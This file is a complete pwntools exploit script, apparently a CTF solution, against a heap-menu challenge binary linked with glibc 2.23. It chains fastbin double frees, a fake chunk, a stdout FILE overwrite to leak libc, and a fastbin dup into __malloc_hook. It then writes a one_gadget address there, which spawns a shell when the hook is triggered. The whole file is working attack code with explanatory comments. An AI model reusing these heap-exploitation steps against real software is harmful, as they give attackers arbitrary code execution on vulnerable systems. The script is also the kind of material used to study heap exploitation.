from pwn import *

# Target is a 64-bit Linux binary; 'debug' echoes every byte that crosses the
# tube, which is useful while the heap layout is being tuned and noisy after.
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

# Local run of the challenge binary.  NOTE(review): a remote() for the live
# target must use the very same libc build as the file loaded below — every
# offset further down the script is computed against it.
p = process('./pwn')
libc = ELF('./libc-2.23.so')
def s(data):
    """Send raw data on the tube without a trailing newline."""
    return p.send(data)


def sa(text, data):
    """Wait for `text`, then send `data` (no newline appended)."""
    return p.sendafter(text, data)


def sl(data):
    """Send `data` followed by the tube newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait for `text`, then send `data` plus the tube newline."""
    return p.sendlineafter(text, data)


def rl(text):
    """Read until `text` is seen (inclusive)."""
    return p.recvuntil(text)


def pr(num=4096):
    """Print whatever is available on the tube, at most `num` bytes."""
    print(p.recv(num))


def inter():
    """Hand the tube over to the user."""
    return p.interactive()


def l32():
    """Read up to the next 0xf7 byte and unpack the last 4 bytes as a 32-bit pointer.

    Assumes the pointer's top byte is 0xf7 (typical 32-bit libc address);
    anything else in the stream will be consumed silently.
    """
    tail = p.recvuntil(b'\xf7')[-4:]
    return u32(tail.ljust(4, b'\x00'))


def l64():
    """Read up to the next 0x7f byte and unpack the last 6 bytes as a 64-bit pointer.

    Assumes a userland address whose top byte is 0x7f; a stray 0x7f earlier
    in the output yields garbage rather than an error.
    """
    tail = p.recvuntil(b'\x7f')[-6:]
    return u64(tail.ljust(8, b'\x00'))


def uu32():
    """Unpack the next 4 bytes as a little-endian 32-bit value."""
    return u32(p.recv(4).ljust(4, b'\x00'))


def uu64():
    """Unpack the next 6 bytes as a little-endian 64-bit value (high bytes zeroed)."""
    return u64(p.recv(6).ljust(8, b'\x00'))


def int16(data):
    """Parse `data` as a hexadecimal integer ('0x' prefix optional)."""
    return int(data, 16)


def lg(s, num):
    """Log `num` in hex under the label `s` at success level."""
    return log.success(f"{s} >>> {hex(num)}")
def add(size, idx, content):
    """Menu option 1: allocate a `size`-byte weapon in slot `idx` named `content`.

    `size` and `idx` are sent as decimal text.  The name goes through sa()
    (no newline appended), so raw payload bytes reach the buffer unmodified —
    this matters for the partial-overwrite payloads below.  The misspelt
    'wlecome' prompt is what the binary prints; do not correct it here.
    """
    dialogue = (
        (b'choice >> ', b'1'),
        (b'wlecome input your size of weapon: ', str(size)),
        (b'input index:', str(idx)),
    )
    for prompt, reply in dialogue:
        sla(prompt, reply)
    sa(b'input your name:', content)
def edit(idx, content):
    """Menu option 3: overwrite the content of slot `idx`.

    Unlike add(), the content is sent with sla(), so a newline follows the
    payload; keep that in mind when the last byte of `content` matters.
    """
    dialogue = (
        (b'choice >> ', b'3'),
        (b'input idx: ', str(idx)),
        (b'new content:', content),
    )
    for prompt, reply in dialogue:
        sla(prompt, reply)
def free(idx):
    """Menu option 2: free slot `idx`.

    The binary does not clear the slot after freeing (the script relies on
    this for the double frees below).  The prompt here is 'input idx :' —
    spelled differently from edit()'s — and matches the binary as-is.
    """
    for prompt, reply in ((b'choice >> ', b'2'), (b'input idx :', str(idx))):
        sla(prompt, reply)
def debug():
    """Attach gdb to the running target, then block until a key is pressed.

    Call it right before the step to inspect; pause() leaves time to set
    breakpoints in the attached gdb before the script continues.
    """
    gdb.attach(p)
    pause()
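# ---- stage 1: fastbin dup -> fake chunk -> stdout FILE overwrite -----------
# 0x50-byte requests share one fastbin size class, 0x60-byte ones another.
# Slot 1 carries a fake chunk header (prev_size 0, size 0x61) 0x40 bytes into
# its data; a redirected fastbin fd below makes that fake chunk allocatable.
# All payloads are bytes: pwntools only turns a str such as '\xb0' into the
# single byte 0xb0 through its latin-1 fallback (with a BytesWarning), so the
# original text literals here depended on context.encoding staying at 'auto'.
add(0x50, 0, b'aaaa')
add(0x50, 1, b'a' * 0x40 + p64(0) + p64(0x61))
add(0x50, 2, b'aaaa')
add(0x60, 3, b'aaaa')
add(0x50, 4, b'aaaa')
add(0x60, 5, b'aaaa')

# Fastbin double free: freeing 0, 1, 0 keeps chunk 0 off the top of the bin
# between its two frees, which is what glibc's "fasttop" check looks at.
free(0)
free(1)
free(0)

# Attaches gdb and blocks in pause(); remove for unattended runs.
debug()
# Re-allocating chunk 0 writes one byte at the start of its user data — the
# low byte of the fastbin fd it still carries — presumably pointing the bin
# at the fake 0x61 chunk inside slot 1.  Two more allocations walk the bin
# until that fake chunk is at its head.
add(0x50, 0, b'\xb0')
add(0x50, 1, b'aaaa')
add(0x50, 0, b'aaaa')

pause()
# Slot 7 is the fake chunk.  Its user data overlaps the next chunk header,
# so this rewrites that header's size to 0xd1 — large enough to leave the
# fastbin range, so the following free() sends it to the unsorted bin and
# leaves libc (main_arena) pointers in the heap.  (Layout inferred from the
# 0x40 offset above; confirm under gdb if the binary's chunk sizes change.)
add(0x50, 7, p64(0) + p64(0xd1))
pause()
free(2)
free(3)

# Carve the unsorted chunk so the libc pointer lands where the 0x70 fastbin
# entry freed as slot 3 keeps its fd, then partially overwrite that fd with
# \xdd\x45.  The low 12 bits are fixed by the libc layout; the 0x4 nibble is
# an ASLR guess, so this stage succeeds about 1 in 16 runs — the leak check
# below is what catches the other 15.
add(0x50, 3, b'aaaaa')
add(0x50, 4, b'\xdd\x45')
add(0x60, 5, b'\xdd\x45')
# Fourth 0x70 allocation returns the forged address (0x43 below
# _IO_2_1_stdout_, whose bytes read as a 0x7f size field).  0x33 bytes of
# padding then reach stdout's _flags: 0xfbad1800 plus zeroed read pointers and
# a cleared low byte of _IO_write_base make the next stdout flush dump libc
# memory from the rounded-down buffer start — the classic 2.23 FILE leak.
add(0x60, 6, b'aaaa')
pause()
edit(6, b'a' * 0x33 + p64(0xfbad1800) + p64(0) * 3 + b'\x00')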
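# The first recv() drains whatever the corrupted stdout has flushed so far;
# the next six bytes are taken as a libc pointer.  NOTE(review): both reads
# are timing-dependent (recv() returns whatever has arrived), so a slow or
# buffered target can shift which six bytes get parsed — verify under gdb.
p.recv()
leaked = u64(p.recv(6).ljust(8, b'\x00'))
# 0x18cc27: distance of the leaked pointer from the libc base.  Carried over
# from the original script rather than derived from the ELF — TODO confirm
# against the libc that actually ships with the target.
leak = leaked - 0x18cc27
# A libc base is non-zero and page-aligned.  The original guard compared
# `leak` with -0x3c5600, which can never match because u64() is non-negative,
# so a wrong ASLR nibble in the \xdd\x45 guess or a short/zero read went
# undetected and the script carried on with a bogus base.
if leak <= 0 or leak & 0xfff:
    log.failure(f"bad libc leak {hex(leak)}: wrong ASLR nibble or shifted read, rerun")
    p.close()
    exit(-1)
p.recv()
lg('leak', leak)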
# one_gadget candidates for this libc build, as offsets from the libc base.
# NOTE(review): hard-coded for the exact libc-2.23 build the script was
# written against and not derived from the ELF loaded above (unlike
# __malloc_hook below); on another build this is the first thing to break.
one_shell = [
    0x4525a,
    0xef9f4,
    0xf0897,
]
# The second candidate is the one used on the __malloc_hook path; if the
# register constraints do not hold at the trigger, try the other two.
shell = leak + one_shell[1]
# ---- stage 2: fastbin dup into __malloc_hook ------------------------------
# Three fresh 0x60-byte slots (0x70 chunks); freeing 8, 9, 8 is the same
# double-free pattern as stage 1, leaving chunk 8 twice in the bin.
add(0x60,8,b'aaaa')
add(0x60,9,b'aaaa')
add(0x60,10,b'aaaa')
free(8)
free(9)
free(8)
malloc_hook = leak + libc.sym['__malloc_hook']
# First re-allocation of chunk 8 rewrites its fd to __malloc_hook-0x23: the
# bytes 8 past that address (the 0x7f high byte of a libc pointer stored just
# before the hook) read as a fastbin-sized header, which is what lets the
# 0x70-bin size check pass — the usual glibc 2.23 trick, confirm in gdb.
add(0x60,8,p64(malloc_hook-0x23))
lg('malloc',malloc_hook)
lg('shell',shell)
# Two allocations drain the bin down to the forged entry ...
add(0x60,9,'a')
add(0x60,10,'a')
# ... and the third returns it; 0x13 bytes of padding (0x23 minus the 0x10
# chunk header) put the gadget address exactly on __malloc_hook.
add(0x60,11,b'a'*0x13+p64(shell))
# Trigger: a second free of slot 0 is meant to make glibc 2.23 report the
# corruption via malloc_printerr, whose error path allocates — and therefore
# calls __malloc_hook — before aborting.  If the shell does not appear,
# the one_gadget constraints are the first thing to check.
free(0)
free(0)
p.interactive()